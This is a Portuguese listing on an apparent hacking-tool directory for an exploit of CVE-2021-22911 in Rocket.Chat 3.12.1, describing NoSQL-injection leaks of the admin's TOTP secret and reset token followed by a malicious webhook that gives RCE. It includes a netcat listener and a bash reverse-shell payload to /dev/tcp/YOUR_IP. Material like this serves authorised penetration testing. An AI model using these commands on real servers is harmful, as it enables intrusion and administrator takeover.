Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-22911-RocketChat — Exploit para Rocket.Chat 3.12.1 RCE via injeção NoSQL pré-autenticação, vazando o segredo TOTP do administrador e o token de redefinição de senha para alcançar execução remota de código por meio de integração maliciosa de webhook. | Kitploit
Ferramentas/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

Exploit para Rocket.Chat 3.12.1 RCE via injeção NoSQL pré-autenticação, vazando o segredo TOTP do administrador e o token de redefinição de senha para alcançar execução remota de código por meio de integração maliciosa de webhook.

Ver Repositório
22há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE (Improvisado)

Descrição

Explora uma vulnerabilidade de injeção NoSQL pré-autenticação no Rocket.Chat 3.12.1 para vazar o segredo TOTP do administrador e o token de redefinição de senha, assumir a conta do administrador e obter RCE por meio de uma integração maliciosa de webhook.

Versão Afetada

Rocket.Chat <= 3.12.1

Requisitos

pip install -r requirements.txt

Configuração - Inicie um Listener Primeiro

Antes de executar o exploit, inicie um listener netcat em um terminal separado para capturar o reverse shell de entrada:

root@kitploit:~
nc -lvnp 4444

Mantenha este terminal aberto. Quando o exploit for executado com sucesso, o seu shell aparecerá aqui.

Uso

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

Argumentos

FlagDescrição
-tURL alvo do Rocket.Chat
-uSeu nome de usuário registrado com privilégios baixos
-pSua senha registrada com privilégios baixos
-eEndereço de e-mail do administrador
-aNome de usuário do administrador
-cComando do reverse shell
-vModo verboso (mostra respostas brutas)

Como Funciona

  1. Autentica como usuário de baixo privilégio via protocolo DDP
  2. Vaza o segredo TOTP do administrador via injeção NoSQL $where
  3. Dispara o e-mail de redefinição de senha do administrador
  4. Vaza o token de redefinição de senha do administrador via injeção NoSQL $where
  5. Redefine a senha do administrador contornando a 2FA usando o segredo TOTP vazado
  6. Cria integração maliciosa de webhook e aciona RCE

Aviso Legal

Esta ferramenta é apenas para fins educacionais e testes de penetração autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Sempre obtenha autorização escrita adequada antes de testar.

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
Baixar ferramenta